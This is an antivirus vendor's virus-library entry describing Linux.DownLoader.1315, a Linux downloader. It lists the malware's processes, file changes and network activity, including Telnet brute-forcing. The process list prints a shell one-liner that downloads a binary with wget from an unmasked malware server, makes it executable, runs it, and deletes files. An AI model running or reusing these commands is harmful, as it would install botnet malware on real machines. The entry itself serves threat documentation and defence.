FOR CUSTOMERS

My library

+ Add to library

Search

24/7 Tech support | Rules regarding submitting

Send a message

Call us

+7 (495) 789-45-86

Forum

Your tickets

Total: -
Active: -
Latest: -

Call us

+7 (495) 789-45-86

EN

RU CN DE EN ES FR IT JP KZ UZ PL BY

Support services

Dr.Web vxCube

Sign in to Dr.Web vxCube

VCI investigations

Virus library

Knowledge base

Technologies

Terminology

Training and education

Myths

Myths about anti-viruses

Linux.DownLoader.1315

Added to the Dr.Web virus database: 2019-08-08

Virus description added: 2019-08-08

Technical Information

Malicious functions:

Removes itself

Launches itself as a daemon

Launches processes:

sh -c wget http://34.67.138.200/dark_bins/dark.mpsl; chmod 777 *; ./dark.mpsl wget.loader.mpsl
wget http://34.67.138.200/dark_bins/dark.mpsl
chmod 777 dark.mpsl run.sh stdout.log
./dark.mpsl wget.loader.mpsl
sh -c rm -rf hmpsl
rm -rf hmpsl

Performs operations with the file system:

Modifies file access rights:

/root/dark.mpsl
/root/run.sh

Creates or modifies files:

/root/dark.mpsl

Deletes files:

/root/hmpsl

Network activity:

Establishes connection:

8.#.8.8:53
34.##.138.200:1791

Attacks using a special dictionary (brute-force technique) via the Telnet protocol.

HTTP GET requests:

34.##.###.200/dark_bins/dark.mpsl

Sends data to the following servers:

34.##.138.200:1791
67.###.48.237:23
10#.#21.5.97:23
16#.##2.139.153:23

Receives data from the following servers:

34.##.138.200:1791

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number